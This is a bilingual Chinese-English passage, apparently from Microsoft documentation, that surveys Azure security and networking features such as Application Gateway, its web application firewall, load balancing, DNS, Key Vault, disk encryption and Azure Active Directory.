它會將 CPU 密集 SSL 終止卸載至應用程式閘道 (亦稱為「SSL 卸載」或「SSL 橋接」),讓您能夠將 Web 伺服陣列的產能最佳化。It allows you to optimize web farm productivity by offloading CPU intensive SSL termination to the Application Gateway (also known as “SSL offload” or “SSL bridging”). 它也提供其他第 7 層路由功能,包括循環配置傳入流量、以 Cookie 為基礎的工作階段同質性、URL 路徑型路由,以及在單一應用程式閘道背後代管多個網站的能力。It also provides other Layer 7 routing capabilities including round-robin distribution of incoming traffic, cookie-based session affinity, URL path-based routing, and the ability to host multiple websites behind a single Application Gateway. Azure 應用程式閘道是第 7 層負載平衡器。Azure Application Gateway is a layer-7 load balancer.

不論是在雲端或內部部署中,此閘道均提供在不同伺服器之間進行容錯移轉及效能路由傳送 HTTP 要求。It provides failover, performance-routing HTTP requests between different servers, whether they are on the cloud or on-premises.

應用程式提供許多應用程式傳遞控制器 (ADC) 功能,包括 HTTP 負載平衡、以 Cookie 為基礎的工作階段同質性、安全通訊端層 (SSL) 卸載、自訂健康狀態探查、支援多網站,以及許多其他功能。Application provides many Application Delivery Controller (ADC) features including HTTP load balancing, cookie-based session affinity, Secure Sockets Layer (SSL) offload, custom health probes, support for multi-site, and many others.

Web 應用程式防火牆Web Application Firewall

Web 應用程式防火牆是 Azure 應用程式閘道的一項功能,可保護使用應用程式閘道執行標準應用程式傳遞控制 (ADC) 功能的 Web 應用程式。Web Application Firewall is a feature of Azure Application Gateway that provides protection to web applications that use application gateway for standard Application Delivery Control (ADC) functions. Web 應用程式防火牆的做法是保護應用程式以防範 OWASP 前 10 個最常見的 Web 弱點。Web application firewall does this by protecting them against most of the OWASP top 10 common web vulnerabilities.

Web 應用程式防火牆

  • SQL 注入保护SQL injection protection

  • 常見 Web 攻擊保護,例如命令插入式攻擊、HTTP 要求走私、HTTP 回應分割和遠端檔案包含攻擊Common Web Attacks Protection such as command injection, HTTP request smuggling, HTTP response splitting, and remote file inclusion attack

  • 防範 HTTP 通訊協定違規Protection against HTTP protocol violations

  • 防止 HTTP 协议异常行为,例如缺少主机用户代理和接受标头Protection against HTTP protocol anomalies such as missing host user-agent and accept headers

  • 防範 Bot、編目程式和掃描器Prevention against bots, crawlers, and scanners

  • 偵測一般應用程式錯誤組態 (也就是 Apache、IIS 等)Detection of common application misconfigurations (that is, Apache, IIS, etc.)

防止 Web 攻擊的集中式 Web 應用程式防火牆可簡化安全性管理作業,並更加確保應用程式能夠對抗入侵威脅。A centralized web application firewall to protect against web attacks makes security management much simpler and gives better assurance to the application against the threats of intrusions. 相較於保護每個個別的 Web 應用程式,WAF 方案還可透過在中央位置修補已知弱點,更快地因應安全性威脅。A WAF solution can also react to a security threat faster by patching a known vulnerability at a central location versus securing each of individual web applications. 現有的應用程式閘道可以輕易地轉換成具有 Web 應用程式防火牆的應用程式閘道。Existing application gateways can be converted to an application gateway with web application firewall easily.

流量管理員Traffic Manager

Microsoft Azure 流量管理員可讓您控制使用者流量,將流量分散到不同資料中心的服務端點。Microsoft Azure Traffic Manager allows you to control the distribution of user traffic for service endpoints in different data centers. 流量管理員支援的服務端點包括 Azure VM、Web Apps 和雲端服務。Service endpoints supported by Traffic Manager include Azure VMs, Web Apps, and Cloud services. 您也可以將流量管理員使用於外部、非 Azure 端點。You can also use Traffic Manager with external, non-Azure endpoints. 流量管理員會使用網域名稱系統 (DNS),根據流量路由方法和端點的健全狀況,將用戶端要求導向到最適當的端點。Traffic Manager uses the Domain Name System (DNS) to direct client requests to the most appropriate endpoint based on a traffic-routing method and the health of the endpoints.

流量管理員提供各種流量路由方法,以符合不同的應用程式需求、端點健全狀況監視、及自動容錯移轉。Traffic Manager provides a range of traffic-routing methods to suit different application needs, endpoint health monitoring, and automatic failover. 流量管理員可針對失敗彈性應變,包括整個 Azure 區域失敗。Traffic Manager is resilient to failure, including the failure of an entire Azure region.

Azure Load BalancerAzure Load Balancer

Azure Load Balancer 可為您的應用程式提供高可用性和網路效能。Azure Load Balancer delivers high availability and network performance to your applications. 這是 Layer 4 (TCP、UDP) 負載平衡器,可將連入流量分配到負載平衡集中所定義服務的狀況良好執行個體。It is a Layer 4 (TCP, UDP) load balancer that distributes incoming traffic among healthy instances of services defined in a load-balanced set. Azure Load Balancer 可以設定為:Azure Load Balancer can be configured to:

  • 对传入到虚拟机的 Internet 流量进行负载均衡。Load balance incoming Internet traffic to virtual machines. 這個組態稱為 網際網路面向的負載平衡This configuration is known as Internet-facing load balancing.

  • 平衡虛擬網路中的虛擬機器之間、雲端服務中的虛擬機器之間,或內部部署電腦與跨單位部署虛擬網路中的虛擬機器之間的流量負載。Load balance traffic between virtual machines in a virtual network, between virtual machines in cloud services, or between on-premises computers and virtual machines in a cross-premises virtual network. 這個組態稱為 內部負載平衡This configuration is known as internal load balancing.

  • 將外部流量轉送到特定的虛擬機器Forward external traffic to a specific virtual machine

內部 DNSInternal DNS

您可以在管理入口網站或網路組態檔中,管理用於 VNet 的 DNS 伺服器清單。You can manage the list of DNS servers used in a VNet in the Management Portal, or in the network configuration file. 客戶可以為每個 VNet 新增最多 12 部 DNS 伺服器。Customer can add up to 12 DNS servers for each VNet. 指定 DNS 伺服器時,請務必確認您會針對客戶環境以正確順序列出客戶的 DNS 伺服器。When specifying DNS servers, it's important to verify that you list customer’s DNS servers in the correct order for customer’s environment. DNS 伺服器清單不會使用循環配置資源,DNS server lists do not work round-robin. 而會依其指定的順序來使用。They are used in the order that they are specified. 如果可以連接至清單上的第一部 DNS 伺服器,用戶端就會使用該 DNS 伺服器,而無論該 DNS 伺服器是否運作正常。If the first DNS server on the list is able to be reached, the client uses that DNS server regardless of whether the DNS server is functioning properly or not. 若要變更客戶虛擬網路的 DNS 伺服器順序,請從清單中移除 DNS 伺服器,然後以客戶想要的順序將其重新加入。To change the DNS server order for customer’s virtual network, remove the DNS servers from the list and add them back in the order that customer wants. DNS 支援 “CIA” 安全性三部曲的可用性層面。DNS supports the availability aspect of the “CIA” security triad.

Azure DNSAzure DNS

網域名稱系統 (或 DNS) 負責將網站或服務名稱轉譯 (或解析) 為其 IP 位址。The Domain Name System, or DNS, is responsible for translating (or resolving) a website or service name to its IP address. Azure DNS 是 DNS 網域的主機服務,採用 Microsoft Azure 基礎結構提供名稱解析。Azure DNS is a hosting service for DNS domains, providing name resolution using Microsoft Azure infrastructure. 只要將您的網域裝載於 Azure,就可以像管理其他 Azure 服務一樣,使用相同的認證、API、工具和計費方式來管理 DNS 記錄。By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools, and billing as your other Azure services. DNS 支援 “CIA” 安全性三部曲的可用性層面。DNS supports the availability aspect of the “CIA” security triad.

Azure 監視器記錄的 NsgAzure Monitor logs NSGs

您可以啟用下列 NSG 的診斷記錄類別︰You can enable the following diagnostic log categories for NSGs:

  • 事件︰包含 NSG 規則會套用到以 MAC 位址為基礎的 VM 和執行個體角色的項目。Event: Contains entries for which NSG rules are applied to VMs and instance roles based on MAC address. 每隔 60 秒會收集一次這些規則的狀態。The status for these rules is collected every 60 seconds.

  • 規則計數器:包含套用每個 NSG 規則以拒絕或允許流量之次數的項目。Rules counter: Contains entries for how many times each NSG rule is applied to deny or allow traffic.

Azure 資訊安全中心Azure Security Center

資訊安全中心可協助您預防、偵測和回應威脅,並加強對 Azure 資源安全性的能見度及控制權。Security Center helps you prevent, detect, and respond to threats, and provides you increased visibility into, and control over, the Security of your Azure resources. 它提供您 Azure 訂用帳戶之間的整合式安全性監視和原則管理、協助偵測可能忽略的威脅,並適用於廣泛的安全性解決方案生態系統。It provides integrated Security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of Security solutions. 網路建議集中圍繞在防火牆、網路安全性群組、設定輸入流量規則等等。Network recommendations center around firewalls, Network Security Groups, configuring inbound traffic rules, and more.

可用的網路建議如下:Available network recommendations are as follows:

計算Compute

本節提供關於這個領域中主要功能的其他資訊,以及這些功能的摘要資訊。The section provides additional information regarding key features in this area and summary information about these capabilities.

反惡意程式碼與防毒軟體Antimalware & Antivirus

運用 Azure IaaS,您可以使用來自安全性廠商 (例如 Microsoft、Symantec、Trend Micro、McAfee 和 Kaspersky) 的反惡意程式碼軟體,以保護您的虛擬機器來抵禦惡意檔案、廣告軟體和其他威脅。With Azure IaaS, you can use antimalware software from security vendors such as Microsoft, Symantec, Trend Micro, McAfee, and Kaspersky to protect your virtual machines from malicious files, adware, and other threats. 適用於 Azure 雲端服務和虛擬機器的 Microsoft Antimalware 是一項保護功能,有助於識別和移除病毒、間諜軟體和其他惡意軟體。Microsoft Antimalware for Azure Cloud Services and Virtual Machines is a protection capability that helps identify and remove viruses, spyware, and other malicious software. Microsoft Antimalware 會提供可設定的警示,在已知的惡意或垃圾軟體嘗試自行安裝或在您的 Azure 系統上執行時發出警示。Microsoft Antimalware provides configurable alerts when known malicious or unwanted software attempts to install itself or run on your Azure systems. 您也可以使用 Azure 資訊安全中心來部署 Microsoft Antimalware。Microsoft Antimalware can also be deployed using Azure Security Center

硬體安全性模型Hardware Security Module

加密和驗證不會改善安全性,除非金鑰本身也受到保護。Encryption and authentication do not improve security unless the keys themselves are protected. 您可以藉由將關鍵密碼和金鑰存放在 Azure Key Vault,來簡化其管理與安全性。You can simplify the management and security of your critical secrets and keys by storing them in Azure Key Vault. Key Vault 讓您能選擇將金鑰存放在通過 FIPS 140-2 Level 2 標準認證的硬體安全性模組 (HSM) 中。Key Vault provides the option to store your keys in hardware Security modules (HSMs) certified to FIPS 140-2 Level 2 standards. 備份或 透明資料加密 的 SQL Server 加密金鑰都能與應用程式的任何金鑰或密碼一起存放在金鑰保存庫中。Your SQL Server encryption keys for backup or transparent data encryption can all be stored in Key Vault with any keys or secrets from your applications. 這些受保護項目的權限和存取權是透過 Azure Active Directory來管理。Permissions and access to these protected items are managed through Azure Active Directory.

虛擬機器備份Virtual machine backup

Azure 備份是一種解決方案,可以不需成本地保護您的應用程式資料,以及將操作成本降到最低。Azure Backup is a solution that protects your application data with zero capital investment and minimal operating costs. 應用程式錯誤可能導致資料損毀,而人為錯誤可能會將 Bug 導入應用程式,因而引發安全性問題。Application errors can corrupt your data, and human errors can introduce bugs into your applications that can lead to security issues. 使用 Azure 備份,您執行 Windows 與 Linux 的虛擬機器會受到保護。With Azure Backup, your virtual machines running Windows and Linux are protected.

Azure Site RecoveryAzure Site Recovery

組織之商務持續性/災害復原 (BCDR) 策略的一個重要部分是,找出在發生計劃中和非計劃中的中斷時讓企業工作負載和應用程式保持啟動並執行的方法。An important part of your organization's business continuity/disaster recovery (BCDR) strategy is figuring out how to keep corporate workloads and apps up and running when planned and unplanned outages occur. Azure Site Recovery 有助於協調工作負載和應用程式的複寫、容錯移轉及復原,因此能夠在主要位置發生故障時,透過次要位置提供工作負載和應用程式。Azure Site Recovery helps orchestrate replication, failover, and recovery of workloads and apps so that they are available from a secondary location if your primary location goes down.

SQL VM TDESQL VM TDE

透明資料加密 (TDE)和資料行層級加密 (CLE) 都是 SQL Server 加密功能。Transparent data encryption (TDE) and column level encryption (CLE) are SQL server encryption features. 此形式的加密需要客戶管理和儲存您用來加密的密碼編譯金鑰。This form of encryption requires customers to manage and store the cryptographic keys you use for encryption.

Azure 金鑰保存庫 (AKV) 服務是設計來改善這些金鑰在安全且高度可用位置的安全性和管理。The Azure Key Vault (AKV) service is designed to improve the security and management of these keys in a secure and highly available location. SQL Server 連接器讓 SQL Server 可以從 Azure Key Vault 使用這些金鑰。The SQL Server Connector enables SQL Server to use these keys from Azure Key Vault.

如果您使用內部部署機器執行 SQL Server,則可遵循一些步驟來從內部部署 SQL Server 機器存取 Azure Key Vault。If you are running SQL Server with on-premises machines, there are steps you can follow to access Azure Key Vault from your on-premises SQL Server machine. 但是對於 Azure VM 中的 SQL Server,您可以使用 Azure Key Vault 整合功能來節省時間。But for SQL Server in Azure VMs, you can save time by using the Azure Key Vault Integration feature. 使用一些 Azure PowerShell Cmdlet 來啟用這項功能,您可以自動化 SQL VM 存取您的金鑰保存庫所需的組態。With a few Azure PowerShell cmdlets to enable this feature, you can automate the configuration necessary for a SQL VM to access your key vault.

VM 磁碟加密VM Disk Encryption

Azure 磁碟加密是一項新功能,可協助您加密 Windows 和 Linux IaaS 虛擬機器磁碟。Azure Disk Encryption is a new capability that helps you encrypt your Windows and Linux IaaS virtual machine disks. 它運用 Windows 的業界標準 BitLocker 功能和 Linux 的 DM-Crypt 功能,為 OS 和資料磁碟提供磁碟區加密。It applies the industry standard BitLocker feature of Windows and the DM-Crypt feature of Linux to provide volume encryption for the OS and the data disks. 此解決方案會與 Azure Key Vault 整合,以協助您控制及管理 Key Vault 訂用帳戶中的磁碟加密金鑰與密碼。The solution is integrated with Azure Key Vault to help you control and manage the disk-encryption keys and secrets in your Key Vault subscription. 此解決方案也可確保虛擬機器磁碟上的所有待用資料都會在您的 Azure 儲存體中加密。The solution also ensures that all data on the virtual machine disks are encrypted at rest in your Azure storage.

虛擬網路Virtual networking

虛擬機器需要遠端連線。Virtual machines need network connectivity. 為了支援該需求,Azure 需要虛擬機器連接到 Azure 虛擬網路。To support that requirement, Azure requires virtual machines to be connected to an Azure Virtual Network. Azure 虛擬網路是以實體 Azure 網路網狀架構為基礎所建置的邏輯建構。An Azure Virtual Network is a logical construct built on top of the physical Azure network fabric. 每個邏輯 Azure 虛擬網路都會與其他所有 Azure 虛擬網路隔離。Each logical Azure Virtual Network is isolated from all other Azure Virtual Networks. 此隔離可協助確保其他 Microsoft Azure 客戶無法存取您部署中的網路流量。This isolation helps insure that network traffic in your deployments is not accessible to other Microsoft Azure customers.

修補程式更新Patch Updates

修補程式更新提供尋找及修正潛在問題的基礎並簡化軟體更新管理程序,方法是減少您必須在企業中部署的軟體更新數目,以及增強您監視合規性的能力。Patch Updates provide the basis for finding and fixing potential problems and simplify the software update management process, both by reducing the number of software updates you must deploy in your enterprise and by increasing your ability to monitor compliance.

安全性原則管理和報告Security policy management and reporting

Azure 資訊安全中心可協助您預防、偵測和回應威脅,並加強提供對 Azure 資源安全性的能見度及控制權。Azure Security Center helps you prevent, detect, and respond to threats, and provides you increased visibility into, and control over, the security of your Azure resources. 它提供您 Azure 訂用帳戶之間的整合式安全性監視和原則管理、協助偵測可能忽略的威脅,並適用於廣泛的安全性解決方案生態系統。It provides integrated Security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of security solutions.

Azure 資訊安全中心Azure Security Center

資訊安全中心利用加強對您 Azure 資源的能見度及安全性控制權,來協助您預防、偵測及回應威脅。Security Center helps you prevent, detect, and respond to threats with increased visibility into and control over the security of your Azure resources. 它提供您 Azure 訂用帳戶之間的整合式安全性監視和原則管理,協助您偵測可能會忽略的威脅,且適用於廣泛的安全性解決方案生態系統。It provides integrated security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of security solutions.

身分識別和存取管理Identity and access management

保護系統、應用程式及資料是從以身分識別為基礎的存取控制開始。Securing systems, applications, and data begins with identity-based access controls. 內建於 Microsoft 商務產品和服務的身分識別與存取管理功能,可協助保護您的組織和個人資訊免於遭受未經授權的存取,同時讓合法的使用者隨時隨地都能視需要來使用它。The identity and access management features that are built into Microsoft business products and services help protect your organizational and personal information from unauthorized access while making it available to legitimate users whenever and wherever they need it.

安全的身分識別Secure Identity

Microsoft 在其產品與服務上使用多個安全性作法與技術來管理身分識別與存取。Microsoft uses multiple security practices and technologies across its products and services to manage identity and access.

  • Multi-Factor Authentication 需要使用者在內部部署和雲端中使用多種方法進行存取。Multi-Factor Authentication requires users to use multiple methods for access, on-premises and in the cloud. 它使用一些簡單驗證選項來提供堅固的驗證,同時透過簡易登入程序來因應使用者。It provides strong authentication with a range of easy verification options, while accommodating users with a simple sign-in process.

  • Microsoft Authenticator (英文) 提供易於使用的 Multi-Factor Authentication 體驗,可搭配 Microsoft Azure Active Directory 和 Microsoft 帳戶一起使用,並包括對於穿戴式裝置與指紋式核准的支援。Microsoft Authenticator provides a user-friendly Multi-Factor Authentication experience that works with both Microsoft Azure Active Directory and Microsoft accounts, and includes support for wearables and fingerprint-based approvals.

  • 密碼原則強制執行藉由加強長度和複雜度需求、強制定期循環,以及在失敗的驗證嘗試之後鎖定帳戶,來提高傳統密碼的安全性。Password policy enforcement increases the security of traditional passwords by imposing length and complexity requirements, forced periodic rotation, and account lockout after failed authentication attempts.

  • 權杖型驗證可透過 Azure Active Directory 啟用驗證。Token-based authentication enables authentication via Azure Active Directory.

  • 角色型存取控制 (RBAC) 可讓您根據使用者指派的角色來授與存取權限,以便輕鬆地只為使用者提供執行其作業內容所需的存取權限。Role-based access control (RBAC) enables you to grant access based on the user’s assigned role, making it easy to give users only the amount of access they need to perform their job duties. 您可以針對每個組織的商務模型和風險承受度自訂 RBAC。You can customize RBAC per your organization’s business model and risk tolerance.

  • 整合式身分識別管理 (混合式身分識別) 可讓您維持控制使用者在內部資料中心和雲端平台上的存取權,建立單一使用者身分識別,以便對所有資源進行驗證與授權。Integrated identity management (hybrid identity) enables you to maintain control of users’ access across internal datacenters and cloud platforms, creating a single user identity for authentication and authorization to all resources.

保護應用程式和資料Secure Apps and data

Azure Active Directory 是全面性的身分識別和存取管理雲端解決方案,可協助保護對現場與雲端中應用程式內資料的存取,並簡化使用者和群組的管理。Azure Active Directory, a comprehensive identity and access management cloud solution, helps secure access to data in applications on site and in the cloud, and simplifies the management of users and groups. 它結合了核心目錄服務、進階身分識別控管、安全性,以及應用程式存取管理,並讓開發人員能夠輕鬆地將以原則為基礎的身分識別管理建置到他們的應用程式中。It combines core directory services, advanced identity governance, security, and application access management, and makes it easy for developers to build policy-based identity management into their apps. 若要增強您的 Azure Active Directory,您可以使用 Azure Active Directory Basic、Premium P1 及 Premium P2 版本來新增付費功能。To enhance your Azure Active Directory, you can add paid capabilities using the Azure Active Directory Basic, Premium P1, and Premium P2 editions.

免費/常用功能Free / Common Features 基本功能Basic Features Premium P1 功能Premium P1 Features Premium P2 功能Premium P2 Features Azure Active Directory Join – 僅適用於 Windows 10 的相關功能Azure Active Directory Join – Windows 10 only related features
目錄物件使用者/群組管理 (新增/更新/刪除)/以使用者為基礎的佈建、裝置註冊單一登入 (SSO)雲端使用者的自助式密碼變更連線 (針對將內部部署目錄延伸至 Azure Active Directory 的引擎進行同步)安全性/使用量報告Directory Objects, User/Group Management (add/update/delete)/ User-based provisioning, Device registration, Single Sign-On (SSO), Self-Service Password Change for cloud users, Connect (Sync engine that extends on-premises directories to Azure Active Directory), Security / Usage Reports 以群組為基礎的存取管理/佈建雲端使用者的自助式密碼重設公司商標 (登入頁面/存取面板自訂)應用程式 ProxySLA 99.9%Group-based access management / provisioning, Self-Service Password Reset for cloud users, Company Branding (Logon Pages/Access Panel customization), Application Proxy, SLA 99.9% 自助式群組和應用程式管理/自助式應用程式新增/動態群組使用內部部署回寫來進行的自助式密碼重設/變更/解除鎖定Multi-Factor Authentication (雲端與內部部署 (MFA Server))MIM CAL + MIM 伺服器Cloud App DiscoveryConnect Health群組帳戶的自動密碼變換Self-Service Group and app Management/Self-Service application additions/Dynamic Groups, Self-Service Password Reset/Change/Unlock with on-premises write-back, Multi-Factor Authentication (Cloud and On-premises (MFA Server)), MIM CAL + MIM Server, Cloud App Discovery, Connect Health, Automatic password rollover for group accounts Identity ProtectionPrivileged Identity ManagementIdentity Protection, Privileged Identity Management 將裝置加入 Azure AD、Desktop SSO、適用於 Azure AD 的 Microsoft Passport、系統管理員 BitLocker 復原MDM 自動註冊、自助式 BitLocker 復原、Windows 10 裝置透過 Azure AD Join 取得的其他本機系統管理員Join a device to Azure AD, Desktop SSO, Microsoft Passport for Azure AD, Administrator BitLocker recovery, MDM auto-enrollment, Self-Service BitLocker recovery, Additional local administrators to Windows 10 devices via Azure AD Join
  • Cloud App Discovery 是 Azure Active Directory 的一個高階功能,可讓您識別組織中的員工所使用的雲端應用程式。Cloud App Discovery is a premium feature of Azure Active Directory that enables you to identify cloud applications that are used by the employees in your organization.

  • Azure Active Directory Identity Protection 是一種安全性服務,會使用 Azure Active Directory 異常偵測功能來提供可能影響組織身分識別之風險事件和潛在弱點的合併檢視。Azure Active Directory Identity Protection is a security service that uses Azure Active Directory anomaly detection capabilities to provide a consolidated view into risk events and potential vulnerabilities that could affect your organization’s identities.

  • Azure Active Directory Domain Services 可讓您將 Azure VM 加入至網域,而不需部署網域控制站。Azure Active Directory Domain Services enables you to join Azure VMs to a domain without the need to deploy domain controllers. 使用者利用其公司的 Active Directory 認證登入這些 VM,並可順暢地存取資源。Users sign in to these VMs by using their corporate Active Directory credentials, and can seamlessly access resources.

  • Azure Active Directory B2C 是一個高可用性的全域身分識別管理服務,適用於可處理數億個身分識別並跨行動裝置與 Web 平台整合的消費者端應用程式。Azure Active Directory B2C is a highly available, global identity management service for consumer-facing apps that can scale to hundreds of millions of identities and integrate across mobile and web platforms. 您的客戶可以透過可自訂的體驗 (現有的社交媒體帳戶) 登入您所有的應用程式,或者您可以建立新的獨立認證。Your customers can sign in to all your apps through customizable experiences that use existing social media accounts, or you can create new standalone credentials.

  • Azure Active Directory B2B 共同作業是一個安全的合作夥伴整合解決方案,可支援公司間的關係,方法則是讓合作夥伴使用由其自行管理的身分識別,選擇性地存取您的公司應用程式和資料。Azure Active Directory B2B Collaboration is a secure partner integration solution that supports your cross-company relationships by enabling partners to access your corporate applications and data selectively by using their self-managed identities.

  • Azure Active Directory Join 可讓您將雲端功能擴充至 Windows 10 裝置以進行集中管理。Azure Active Directory Join enables you to extend cloud capabilities to Windows 10 devices for centralized management. 它可讓使用者透過 Azure Active Directory 連接到公司或組織雲端,並簡化對應用程式和資源的存取。It makes it possible for users to connect to the corporate or organizational cloud through Azure Active Directory and simplifies access to apps and resources.

  • Azure Active Directory 應用程式 Proxy 為內部部署裝載的 Web 應用程式提供 SSO 及安全的遠端存取。Azure Active Directory Application Proxy provides SSO and secure remote access for web applications hosted on-premises.

後續步驟Next Steps

您可以用來保護 Azure 中的服務和資料的 Azure 服務與功能Azure services and features you can use to help secure your services and data within Azure

加強 Azure 資源的可見度及安全性控制,達到預防、偵測及回應威脅的目的Prevent, detect, and respond to threats with increased visibility and control over the security of your Azure resources

Azure 資訊安全中心內的監視功能,透過原則監視合規性。The monitoring capabilities in Azure Security Center to monitor compliance with policies.